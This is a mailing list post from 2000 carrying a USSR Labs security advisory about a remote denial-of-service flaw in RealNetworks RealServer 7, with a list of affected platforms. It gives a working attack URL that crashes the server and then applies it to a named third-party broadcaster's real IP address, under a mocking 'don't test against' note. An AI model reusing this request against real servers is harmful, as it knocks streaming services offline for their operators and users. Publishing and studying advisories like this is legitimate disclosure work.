Return-Path: owner-win2ksecadvice@LISTSERV.NTSECURITY.NET MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Message-ID: Date: Tue, 1 Aug 2000 07:58:06 -0300 Reply-To: "Discussion regarding Windows-related security vulnerabilities and risks." From: Ussr Labs Subject: Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability Comments: cc: nTBUGTRAQ To: win2ksecadvice@LISTSERV.NTSECURITY.NET -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability USSR Advisory Code: USSR-2000043 Release Date: June 1, 2000 Systems Affected: Real Networks Real Server 7 Linuxc6 Real Networks Real Server 7 Solaris 2.6 Real Networks Real Server 7 Solaris 2.7 Real Networks Real Server 7 Solaris 2.8 Real Networks Real Server 7 Windows NT/2000 Real Networks Real Server 7 SGI Irix 6.2 Real Networks Real Server 7 SGI Irix 6.5 Real Networks Real Server 7 SCO Unixware 7.xx Real Networks Real Server 7 FreeBSD 3.0 Real Networks Real Server 7.01 Linuxc6 Real Networks Real Server 7.01 Solaris 2.6 Real Networks Real Server 7.01 Solaris 2.7 Real Networks Real Server 7.01 Solaris 2.8 Real Networks Real Server 7.01 Windows NT/2000 Real Networks Real Server 7.01 SGI Irix 6.2 Real Networks Real Server 7.01 SGI Irix 6.5 Real Networks Real Server 7.01 SCO Unixware 7.xx Real Networks Real Server 7.01 FreeBSD 3.0 Real Networks Real Server G2 1.0 THE PROBLEM The Ussr Labs team has recently discovered a memory problem in the RealServer 7 Server (patched and non-patched). What happens is, by performing an attack sending specially-malformed information to the RealServer HTTP Port(default is 8080), the process containing the services will stop responding. The Exploit: It will take down the RealServer causing it to stop all streaming media brodcasts, making it non-functional, (untill Reboot) Example: With the RealServer server running on 'Port' (default being 8080) the syntax to do the D.O.S. attack is: http://ServerIp:Port/viewsource/template.html? And Real Server will Stop Responding. Example: With the RealServer server running on 'Port' (default being 8080) the syntax to do the D.O.S. attack is: http://ServerIp:Port/viewsource/template.html? And Real Server will Stop Responding. SPECIAL NOTE: That we take no responsibility for this Example it is for educational purposes only,Dont test against British Broadcasting Corporation 1999 Radio Exaple 2: Radio: British Broadcasting Corporation 1999 (default in RealPlayer 8) Radio Url: http://playlist.broadcast.com/makeplaylist.asp?id=7708&encad=2F6164732 F617564696F686967687761792F617564696F68696768776179325F3238 RealServer http running on port 80 RealServer http ip: 206.190.42.7 Valid Url for Clip Source: http://206.190.42.7/viewsource/template.html?nuyhtgs0pdz6iqm557a6i9bgj 054ngdnbfzgro7zxfAjq357lnwEC6ne8s5ge5hi4ejqC1t6x1amngaAmkyf59v6zgjqC1t 6x1amngoAmkyf1AvuEfhe640hBh60EeADAo2097qglh Malformed Url for Clip Source: http://206.190.42.7/viewsource/template.html? Vendor Status: Yes! Informed! I sent them more than 4 emails and each time I received JUNK mails in reply, my Incident ID number for this request is 19163930. Vendor Url: http://www.real.com Program Url: http://www.realnetworks.com/products/basicserverplus/index.html?src=ho me Download Url: http://proforma.real.com/rn/servers/eval/index.html?src=home,srvpl_020 400,srvntra Related Links: Underground Security Systems Research http://www.ussrback.com Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN, Sub, prizm, b0f,Technotronic and Rfp. Copyright (c) 1999-2000 Underground Security Systems Research. Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of Ussr. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail labs@ussrback.com for permission. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Feedback: Please send suggestions, updates, and comments to: Underground Security Systems Research mail:labs@ussrback.com http://www.ussrback.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use iQA/AwUBOYasW63JcbWNj6DDEQLZxgCgjWeLKvWMrBK31yLVcVFyE5c0L3kAoN7S oWEgPTUN+phP6uJGmJxy056c =yK6F -----END PGP SIGNATURE----- _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net